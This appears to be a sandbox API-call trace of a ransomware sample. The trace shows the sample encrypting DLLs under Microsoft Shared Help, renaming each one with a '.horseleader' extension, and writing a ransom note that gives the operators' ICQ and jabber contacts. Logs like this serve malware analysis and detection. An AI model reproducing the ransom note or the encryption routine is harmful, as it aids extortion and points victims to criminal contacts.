pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\..") returned 58 [0228.449] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0228.449] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0228.449] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x60d54030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x133200, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hxds.dll", cAlternateFileName="")) returned 1 [0228.449] lstrcmpiW (lpString1="hxds.dll", lpString2="Windows") returned -1 [0228.450] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 64 [0228.450] StrStrIW (lpFirst="hxds.dll", lpSrch=".horseleader") returned 0x0 [0228.450] lstrcmpW (lpString1="hxds.dll", lpString2="#Decrypt#.txt") returned 1 [0228.450] lstrcmpW (lpString1="hxds.dll", lpString2="_uninstalling_.png") returned 1 [0228.450] lstrlenW (lpString=".testttjffg") returned 11 [0228.450] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll", lpSrch=".testttjffg") returned 0x0 [0228.450] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.450] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.450] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.452] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 64 [0228.452] StrStrW (lpFirst="hxds.dll", lpSrch=".txt") returned 0x0 [0228.452] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1257984) returned 1 [0228.452] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.452] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.455] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.455] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.456] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x97100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.456] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.459] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.459] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.459] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x12e200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.459] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.464] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.464] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.464] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.464] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.465] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.465] CloseHandle (hObject=0x158) returned 1 [0228.465] GetProcessHeap () returned 0x780000 [0228.465] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.465] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.horseleader") returned 76 [0228.465] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll.horseleader")) returned 1 [0228.466] GetProcessHeap () returned 0x780000 [0228.466] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.466] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3e47200, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x522dc930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe3e47200, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x1bf200, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ITIRCL55.DLL", cAlternateFileName="")) returned 1 [0228.467] lstrcmpiW (lpString1="ITIRCL55.DLL", lpString2="Windows") returned -1 [0228.467] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 68 [0228.467] StrStrIW (lpFirst="ITIRCL55.DLL", lpSrch=".horseleader") returned 0x0 [0228.467] lstrcmpW (lpString1="ITIRCL55.DLL", lpString2="#Decrypt#.txt") returned 1 [0228.467] lstrcmpW (lpString1="ITIRCL55.DLL", lpString2="_uninstalling_.png") returned 1 [0228.467] lstrlenW (lpString=".testttjffg") returned 11 [0228.467] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL", lpSrch=".testttjffg") returned 0x0 [0228.467] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.467] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.467] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.468] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 68 [0228.468] StrStrW (lpFirst="ITIRCL55.DLL", lpSrch=".txt") returned 0x0 [0228.468] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1831424) returned 1 [0228.468] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.468] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.471] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.471] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.471] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xdd100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.471] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.474] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.474] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.474] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1ba200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.474] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.477] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.477] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.477] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.477] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.478] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.478] CloseHandle (hObject=0x158) returned 1 [0228.478] GetProcessHeap () returned 0x780000 [0228.478] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.478] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.horseleader") returned 80 [0228.478] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.horseleader")) returned 1 [0228.479] GetProcessHeap () returned 0x780000 [0228.479] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.479] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x616b36d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x69000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msitss55.dll", cAlternateFileName="")) returned 1 [0228.479] lstrcmpiW (lpString1="msitss55.dll", lpString2="Windows") returned -1 [0228.479] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 68 [0228.480] StrStrIW (lpFirst="msitss55.dll", lpSrch=".horseleader") returned 0x0 [0228.480] lstrcmpW (lpString1="msitss55.dll", lpString2="#Decrypt#.txt") returned 1 [0228.480] lstrcmpW (lpString1="msitss55.dll", lpString2="_uninstalling_.png") returned 1 [0228.480] lstrlenW (lpString=".testttjffg") returned 11 [0228.480] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll", lpSrch=".testttjffg") returned 0x0 [0228.480] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.480] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.480] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.503] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 68 [0228.503] StrStrW (lpFirst="msitss55.dll", lpSrch=".txt") returned 0x0 [0228.503] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=430080) returned 1 [0228.503] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.503] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.509] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.509] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.510] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x32000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.510] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.537] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.537] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.538] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x64000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.538] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.855] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.856] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.896] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.897] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.897] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.897] CloseHandle (hObject=0x158) returned 1 [0228.898] GetProcessHeap () returned 0x780000 [0228.898] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.898] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.horseleader") returned 80 [0228.898] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll.horseleader")) returned 1 [0228.915] GetProcessHeap () returned 0x780000 [0228.915] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.915] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x616b36d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x69000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msitss55.dll", cAlternateFileName="")) returned 0 [0228.915] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0228.915] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\#Decrypt#.txt") returned 69 [0228.915] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0228.916] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0228.916] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0228.920] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0228.920] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0228.920] CloseHandle (hObject=0x21c) returned 1 [0228.920] GetProcessHeap () returned 0x780000 [0228.920] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0228.920] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ink", cAlternateFileName="")) returned 1 [0228.920] lstrcmpiW (lpString1="ink", lpString2="Windows") returned -1 [0228.921] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 54 [0228.921] lstrcmpW (lpString1="ink", lpString2=".") returned 1 [0228.922] lstrcmpW (lpString1="ink", lpString2="..") returned 1 [0228.922] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0228.922] GetProcessHeap () returned 0x780000 [0228.922] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0228.922] 